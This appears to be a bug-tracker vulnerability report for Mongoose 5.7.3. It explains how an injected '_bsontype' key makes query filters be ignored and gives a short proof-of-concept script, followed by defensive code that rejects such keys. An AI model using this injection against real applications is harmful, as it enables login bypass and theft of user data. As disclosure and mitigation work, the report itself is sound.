Description
Do you want to request a feature or report a bug?
Vulnerability
What is the current behavior?
With this vulnerability, an attacker might steal sensitive data or bypass authentication in Node.js applications that use Mongoose as a front end.
When injecting a "_bsontype" attribute into a query object (e.g., id in find(id)), Mongoose will directly ignore the query object. This can be abused since most Node.js applications treat user input as an object. For example, an attacker can force the query filter condition to be null by adding another attribute (_bsontype) to the user-input data. By doing this, an attacker can log into other users' accounts or bypass the token verification logic during password reset [1]. Even though Mongoose checks the query object against the schema when querying in the form of findOne(id:id_object), the vulnerability can still be exploited if developers do queries like findOne(id).
Similar issues are also found in MongoDB, and we have reported them. However, just to be safe, my suggestion is that Mongoose should also filter _bsontype before invoking MongoDB, since _bsontype is an internal attribute used by MongoDB.
If the current behavior is a bug, please provide the steps to reproduce.
Proof of Concept
const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/bsontype', { useNewUrlParser: true });
const Schema = mongoose.Schema;
const ObjectId = Schema.ObjectId;
const userSchema = new Schema({
  author: ObjectId,
  username: String,
  password: String,
  token: String
});
const users = mongoose.model('users', userSchema);
// A filter that should match nothing ("wrongToken"), but the extra
// "_bsontype" key makes Mongoose ignore the whole filter object.
const token = { "t": "wrongToken", "_bsontype": "a" };
users.findOne(token, function (err, res) {
  // Prints the first user document instead of null.
  console.log(res);
});
What are the versions of Node.js, Mongoose and MongoDB you are using? Note that "latest" is not a version.
Mongoose 5.7.3
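The mitigation the report suggests (filtering `_bsontype` before the filter reaches the driver) can also be applied on the application side. The following is an added example, not code from the issue or from Mongoose: a small input guard that rejects user-supplied filter objects containing BSON-internal or operator keys at any depth, and a builder that copies only the expected field into the query. The helper names (`assertSafeInput`, `buildTokenFilter`) and the `{ t: ... }` input shape are assumptions taken from the proof of concept above; the example runs without a database.

```javascript
// Added example (not from the original issue): defensive filtering of
// user-supplied query objects before they are handed to Mongoose.
// Helper names are hypothetical; no Mongoose connection is required.

// Keys that must never originate from user input: query operators ("$..."),
// dotted paths, and the BSON-internal "_bsontype" key abused in the report.
const RESERVED_KEY = /^\$|^_bsontype$|\./;

function isPlainObject(v) {
  if (v === null || typeof v !== 'object' || Array.isArray(v)) return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// Throw on any reserved key at any depth. Rejecting instead of silently
// stripping makes tampering attempts visible in application logs.
function assertSafeInput(value, path = '') {
  if (Array.isArray(value)) {
    value.forEach((v, i) => assertSafeInput(v, `${path}[${i}]`));
    return value;
  }
  if (isPlainObject(value)) {
    for (const [k, v] of Object.entries(value)) {
      if (RESERVED_KEY.test(k)) {
        throw new Error(`reserved key "${k}" in user input at ${path || '<root>'}`);
      }
      assertSafeInput(v, path ? `${path}.${k}` : k);
    }
  }
  return value;
}

// Build the Mongoose filter by copying only the field the application
// expects, with the type the schema declares (token: String). Extra keys
// from the request body never reach the query.
function buildTokenFilter(userInput) {
  assertSafeInput(userInput);
  if (typeof userInput.t !== 'string' || userInput.t.length === 0) {
    throw new TypeError('token must be a non-empty string');
  }
  return { token: userInput.t };
}

// Constructed inputs: the proof-of-concept object from the issue, and a
// benign one. Usage would be users.findOne(buildTokenFilter(req.body), ...).
const poc = { t: 'wrongToken', _bsontype: 'a' };
const benign = { t: 'abc123' };
console.log(buildTokenFilter(benign));
try {
  buildTokenFilter(poc);
} catch (e) {
  console.log('rejected:', e.message);
}
```

The whitelist builder is the part that closes the hole described above: even if a future driver or Mongoose version treats `_bsontype` differently, the query only ever contains the one field the code chose to put there.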